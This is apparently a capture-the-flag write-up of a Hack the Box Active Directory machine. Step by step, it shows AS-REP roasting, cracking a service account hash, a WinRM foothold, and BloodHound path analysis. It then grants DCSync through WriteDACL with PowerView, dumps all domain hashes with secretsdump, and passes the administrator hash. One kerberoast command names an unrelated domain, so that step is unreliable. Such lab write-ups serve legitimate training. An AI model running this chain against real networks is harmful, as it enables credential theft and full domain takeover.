This is a "Hack the Box" Active Directory machine. Rated "easy" by the HTB community, although it seemed much harder than other "easy" machines.
Recon
I use rustscan to quickly identify all open ports and add options that immediately triggers nmap to run using script and version scans against the open ports it found.
Port 88 —
Kerberosand port 389 -ldapindicate that this is a Active Directory (AD) machine. The ldap discovery of the domain and type of machine confirms it is.
Add the domain to our /etc/hosts file.
I like to check smb for shares that could be valuable. I do this with smbmap.
smbmap -H htb.localNo luck.
RPC and LDAP are protocols that if misconfigured, we can get a lot of domain information from unauthenticated queries. Let's test RPC first.
rpcclient -N 10.129.95.210
rpcclient -U '' 10.129.95.210Connecting on
rpcvia null authentication must be blocked or restricted.
LDAP Enumeration
We can test LDAP using ldapsearch.
ldapsearch -H ldap://10.129.95.210 -x -b "dc=htb,dc=local" # too much informationWe can modify the query to get more concise output.
ldapsearch -H ldap://10.129.95.210 -x -b "dc=htb,dc=local" '(objectClass=Person)' sAMAccountName | grep 'sAMAccountName:' | cut -d ' ' -f 2Now that we have users, we can run some AD attacks and try getting more information. First, we need to add these users to a file and then check if any of them have Kerberos pre-authentication disable. This is an AS-REP roast attack and if it is disabled then we will get back their encrypted password hash which we can crack offline.
echo 'sebastien
lucinda
andy
mark
santi
' > users.txtAD Attacks
GetNPUsers.py -request -usersfile users.txt htb.local/ -dc-ip 10.129.95.210These users seem to not have Kerberos pre-authentication disabled.
We cannot run a kerberoasting attack or start bloodhound because we have no domain credentials yet. It's time to go back through our enumeration methodology and see if there was anything that I missed. I want to run a tool to get domain information again with enum4linux.
enum4linux 10.129.95.210We got a user that our ldap query missed. This is why using multiple tools for the same thing is crucial. Some tools may identify things others don't because of how the network has their security controls set up.
Add new user to file and run GetNPUsers.py again.
echo 'svc-alfresco' >> users.txt
GetNPUsers.py -request -usersfile users.txt htb.local/ -dc-ip 10.129.95.210The AS-REP (Authentication Server Response) is an encrypted Kerberos Ticket-Granting Ticket (TGT) for a user account whose Kerberos pre-authentication is disabled.
We can search this this hash identifier $krb5asrep$23$ here: https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txtWe have domain credentials!
I like to run a kerberoasting attack because it could be a quick win. We can run this attack with any authenticated domain user. By default, any authenticated domain user can query AD to get a list of all accounts with registered SPNs. This attack will get the Kerberos Service Tickets for registered SPNs and we will get in an encrypted hash that we could crack offline.
GetUserSPNs.py -request -dc-ip 10.129.95.210 active.htb/SVC_TGSOur user credentials are valid; it seems that there are no
kerberoastableusers.
Foothold
We can check if our user credentials can get us initial access to the machine by running a tool like crackmapexec or the newer version netexec.
netexec winrm 10.129.95.210 -u svc-alfresco -p 's3rvice'
svc-alfrescohas administrative privileges via thewinrmprotocol on the target. We can use a tool likeevil-wirnmto access the target.
evil-winrm -i 10.129.95.210 -u svc-alfresco -p 's3rvice'We have a foothold within the network.
The user.txt can be found in the Desktop directory.
cd ../Desktop
cat user.txtThe first thing I always check besides the network is the user's permissions much like sudo -l on a Linux machine.
whoami /privNothing very useful.
BloodHound
We could start up BloodHound to get a visual representation of the AD environment.
/opt/bloodhound-cli up # starts bloodhound
/opt/bloodhound-cli running # shows the running services and the port that bloodhound ui is on.We're in, but we need to collect data to investigate.
I like using this bloodhound script that I got from a Tyler Ramsby AD enumeration video. You input the information required and it starts the data collection process for us.
/opt/ad-bloodhound.shAll the json files were collected from the execution of this script.
We can upload these files by going to the bloodhound ui > administration > upload files.
Now we have to navigate to the left pane again and select explore. Search our user as the starting node and make sure they are marked as "owned". In this scenario I went to the PATHIFINDING feature at the top and added our user svc-alfresco as the starting node and the DC htb.local as the destination node. It created a direct path for us in order to compromise the entire domain. Such a great tool!
We can see at the bottom the path, and if we select each specifically, it'll tell us how and why it works.
Based on this path it looks like our user has nested group permissions. The primary purpose of nesting groups is to simplify access management by following a structured model, but it can also create complex and dangerous privilege escalation paths if not managed carefully. The security issues here are:
- Because of nested groups, our user effectively inherits all the permissions of the final group, Account Operators.
- The
Account Operatorsgroup is a default, built-in security group in Active Directory (AD) that can create and modify user accounts. - With
GenericAll, an attacker can modify the DC's security settings to grant themselves rights likeDCSync, which allows them to impersonate any user and extract all password hashes from the domain. - The WriteDACL (Write Discretionary Access Control List) permission on a Domain Controller is one of the most critical permissions an attacker can have. It allows a user to modify the security descriptor of the DC, meaning they can grant themselves new, higher privileges, such as Full Control over the DC object, leading to a complete Domain Compromise.
Priv Esc
First, we'll abuse the Account Operators permissions by adding a user to the domain.
net user jose pass123 /add /domain
net group "Exchange Windows Permissions" jose /addNow we can abuse WriteDACL to give our new user the DCSync rights. First, we transfer the Powerview binary using the upload feature with evil-winrm. Importing PowerView allows us to run commands like "Add-DomainObjectAcl," which is needed to abuse the WriteDACL permission.
upload PowerView.ps1
powershell -ep bypass
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'pass123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\jose', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jose -Rights DCSyncNo errors, guessing it worked.
The last command from the bloodhound image shows we can start mimikatz and run lsadump::dcsync. I rather use secretsdump since it'll be faster.
secretsdump.py htb.local/jose:pass123@10.129.95.210We got all the domain account hashes.
There are several things we could do. We could take all these hashes and crack offline, we could add these users/hashes to files and spray them using netexec/crackmapexec. However, since evil-wirnm allows us to sign in with the NT portion of the hash (second half), we could simply attempt logging in with the administrator username and their NT hash.
evil-winrm -i 10.129.95.210 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6Pwn3d!